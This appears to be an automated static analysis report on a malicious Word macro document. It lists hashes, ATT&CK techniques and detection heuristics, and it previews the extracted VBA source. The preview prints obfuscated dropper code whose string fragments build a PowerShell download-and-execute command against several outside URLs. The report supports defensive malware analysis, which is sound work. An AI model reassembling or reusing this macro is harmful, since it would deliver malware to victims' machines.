Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a5af8308ee192a6…

MALICIOUS

Office (OLE)

Size: 174.5 KB
Created: 2017-12-08 05:37:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 8791a31133c26b7e578ddc98f870e3f5
SHA-1: b90143cab8890fffe94078fdc148c16435ceef90
SHA-256: 4a5af8308ee192a68eb535e2abc467c2c70cd84291f6a72598604f7eb3cf45d2
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function. The macro uses the Shell() function, a common technique for executing arbitrary commands, which indicates an attempt to download and execute a secondary payload. The matching 'Img.Dropper.PhishingLure-6443153-0' signature further supports the malicious classification.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (severity: medium, 3 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 67734 bytes
SHA-256: 5ecf1fc155d9139863703ece43c96b5ecc09240f95bfee34eb99e332308dcaaa

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MoCcfYLiXIJ"
Function CiSqtWs()
mvzKX = Array(UCase("OKRENzMtCm" + "qShTNrV" + "MWEBYncH" + "EMzHCansGrWRb" + "ROiZTiov"), UCase("YVoAJJsRk" + "XoqmznrubGzwt" + "KnnuNIYAJtbm" + "ZdjOamZEX" + "bhmbnNpTZcD"))
XsDHwGmf = Mid("PRjfotUHj4mVzjh6+'+wU6nv:pubwU6+wU6lwU6+wU6ic wU6+wUY9R+Y9R6+ EcmwU6+wU6X02wU6+wU6Ecm + wU6+wU6eaUkarY9R+Y9Raw'+'U6Y9R+Y'+'9R+wU6pas + Ecm.Y9R+Y9RexewU6+wU6EcmwU6+wU6N7Do0doFQlLDRPIRU6A8", 17, 150)
wTQRXNRja = Array(UCase("KUrvnOuVqwOYoi" + "QQzpShlMQYdHV" + "wFwoQzELozMtf" + "JCAjtwwIBAn"), UCase("ZHbXJHZf" + "tQjXlnEbAcYBI" + "OYzNWso" + "wBDYwjR" + "FUAjPlQIIKtjB"))
bicOzjwKD = Array(UCase("VWwEbTWfzLLZS" + "rrZMThmML" + "bhlnTaBJL" + "HMQWKGhsdQVM"), UCase("WVztNJWD" + "KlcuiiLX" + "BOjJfbDB" + "zujvrOXOS" + "joAofwBftP"))
CWpPBZizTET = Array(UCase("bzOZLCwwabLOj" + "ktzRsVSpRW" + "zjUCYkYSI" + "VaRmqwJGJiwwZB" + "YvJiXljrKL"), UCase("duCrnwYWOS" + "iCXIiHsSBHTd" + "oOjkMpiGbVUPES" + "AZDmGqRHLPDZz" + "KOKRCCYMoJZka"))
aKBEGn = Mid("WfFM6moCHAR]92)vgY9R+Y9RVIeXY9R)-cRE'+'PLaCe  Y9RvgVY9R,[CHar]124  -rePLACE  Y9RwU6Y9R,[CHar]39) )') -REplTqIFUicKGOiHk6h", 8, 99)
WRsWihmq = Array(UCase("wjGHUwaNqW" + "LvWJZPtOWUQqq" + "BZDKdwKmpA" + "coXPzAbzr"), UCase("ESWYmlfsDiq" + "lSZWCNZfZ" + "VvwaWwY" + "oqwtwGhlq" + "ftlSXMCE"))
wSIUKIBzQiI = Array(UCase("jCtdoAR" + "DjWJXHXVIPi" + "QGKwCPSol" + "NWPNaJWZkzbjK"), UCase("usfRpTBJBMm" + "subZhdpKTAu" + "jNzifjmh" + "jDJkBwSrDUCaAR" + "wKRwtzJuwVl"))
nQMBouAJoC = Array(UCase("NvnDmsXzoJ" + "IRQzRMpCzGNZ" + "YZXLSZl" + "FOHXbYGKFME" + "JIlaDYEMYwNzW"), UCase("fMVLiOXFCDJc" + "nisruJhuQowHu" + "YCJBHBrttp" + "ipTDFiQbiRijFS" + "opPYZEjtzCtCC"))
LzFOwTO = Mid("0Hk. ( $pShoMe[21]+$PSHoME[34]+'X')( (('. ( s4oEnv:COmSPe'+'c[4,26,25]-JOinY9RY9R)(((Y9R((wU6ea'+'UwU6+wU6franc = new-objewU6+wU6ct SystwU6+wU6ewU6+wU6m.NewUY9R+Y9R6+wU6twU6+wU6.MnwSGkHtDSZpS8rpEZQ9GKFk4BMwi", 4, 175)
qTRQFH = Array(UCase("USdRZFdLrRp" + "iXSQfrjfwXjV" + "onwWIKOPX" + "ZZCcUWFkhUkUVh"), UCase("PHlFiwjIzlRhoi" + "aQGatqc" + "OIqnCAhUS" + "ctDdKsBqR" + "rDpQBbu"))
MlcELakVT = Array(UCase("wtoCzLTNqKF" + "fMDuWDiQMBi" + "QpwwUAMjOA" + "XpdHHXbwETtY"), UCase("qEjpTmOwOT" + "INXsqwZRfcfF" + "wbtkDZCWQaFQT" + "MclnIVqztA" + "IGtctuKzntst"))
EYoYKmz = Array(UCase("EnAMvvjnhOMlkJ" + "kqfoijOw" + "QJuTkWFzFjXA" + "zAOHoZJNUQm" + "YsAIOOprTw"), UCase("AMCKIPfBlHJs" + "abronTvsIvM" + "ForVhJHBONu" + "PBzpPAQOzUim" + "BDzBtsRpjC"))
riRiVsaBE = Mid("5Rinc.com/F68qOaqY9R+Y9R/,htw'+'U6+'+'wU6tpY9R+Y9R://wU6+wU6tsimtwU6+wU6sum.'+'eu/3'+'GwU6+wU6rPPhY'+'/,wU6+wU6httpwU6+wU6://ewU6+wU6cgcksa.wU6+wU6cwU6+wU6om/wU6+wU611wU6+wU6QMwU6+wU6/EwU6+wjcoVB2F5wMq6Jwz0SLV2Iip5VpWSXT1udGGd", 2, 189)
LQNoHZk = Array(UCase("spRQrmRcWbN" + "toWjCwhsCvSIu" + "juRjcTjHuT" + "aIGiGlf"), UCase("nzGoPkwLAbzW" + "VUGWKqzt" + "ltCiboa" + "vJncHXZG" + "vfIifwz"))
XPwMHnf = Array(UCase("njEzCrQMhFZ" + "VFdHiwikGFwj" + "HAUVczj" + "XBjwTLIDVFRbRi"), UCase("QknrBRUihXrvrw" + "EHqnwEtKKmVjl" + "hEocEEkpGhhDSB" + "cQRHdBJlif" + "WacEfkijASCSm"))
HPTCUmAPWFh = Array(UCase("LHEJRIblhf" + "iEQYYzVEKc" + "VYDFNNdK" + "iBZNziSowww" + "qqawYjPKfzf"), UCase("DmjFLvOIWEpjfD" + "ufhHMiiiid" + "pdNzvlWc" + "MzMcBjpD" + "AuSUJVfwqTSU"))
LSFvv = Mid("iNZCDNmorzGteawU6+wU6UbcdwU6+wU6 wU6+wU6Wh55Rlho5OkVh7u0", 13, 28)
UbdrSIAuvS = Array(UCase("HPBIGvlrlhWEZ" + "wXTKzNhK" + "BCwUjBGa" + "iPWmHcXkFfovia"), UCase("bkczrVZK" + "CAGJbCqfHZaJkL" + "rmMICVRTb" + "swZGibFFZjHW" + "JCoInIACq"))
PjiRLsZHbp = Array(UCase("wcDFkuWJ" + "KCsNwSE" + "coishjo" + "TsUzvCKpDz"), UCase("ZvwvjcwjQbwY" + "tjqdpQRt" + "lRBCMJHsD" + "zifKdszP" + "zYsXTHDLMjAn"))
IOcSIazbIbD = Array(UCase("adsiVRpcl" + "bfwrrqHwnLZfAb" + "KaWzKHKzuUYqd" + "TBjFuWphz" + "WcKzYuv"), UCase("QrLrTdbnRfE" + "SzdhTKsaGF" + "daQdhwNbAZvamF" + "hCiGFKccmWz" + "dOBUWKtiQCA"))

... (truncated)